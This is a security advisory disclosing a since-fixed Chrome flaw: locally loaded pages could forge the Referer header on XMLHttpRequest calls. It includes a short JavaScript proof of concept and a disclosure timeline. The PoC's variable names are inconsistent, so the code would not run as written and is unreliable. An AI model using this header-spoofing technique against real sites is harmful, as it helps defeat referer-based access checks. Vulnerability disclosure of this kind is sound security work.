Advisory: XMLHttpRequest HTTP Referer Header Faking Author: Liad Mizrachi Vendor URL: http://www.chromium.org/ Vulnerability Status: Fixed Application Version: Google Chrome v25.0.1364.152 ========================== Vulnerability Description ========================== Chromium is the open source web browser project from which Google Chrome draws its source code. Chromium fails to validate the use of unsafe headers when the page is load from the local drive, allowing to set and change the referer header using "setRequestHeader" when generating a Ajax (XMLHttpRequest) request. ========================== PoC ========================== function SendReq() { var xmlhttp = new XmlHttpRequest(); xmlHttp.onreadystatechange = readyStateChanged; xmlHttp.open("GET", "http://AnySite.com/checkReferer.php", true); xmlHttp.setRequestHeader("Referer", "http://valid.referer.com"); xmlHttp.send(); } ========================== Solution ========================== Block all scripts from setting unsafe headers in XMLHttpRequest. - Fixed by vendor. ========================== Disclosure Timeline ========================== 04-Mar-2013 - Google Security Team informed by mail. 14-Mar-2013 - Google Security Team Reply: "Since ChromeOS is an open source project, please file the report directly in their bug tracker" 14-Mar-2013 - Security Bug Opened @ Chromium project. 30-Apr-2013 - Fixed. ========================== References ========================== http://www.chromium.org/ https://codereview.chromium.org/13979011/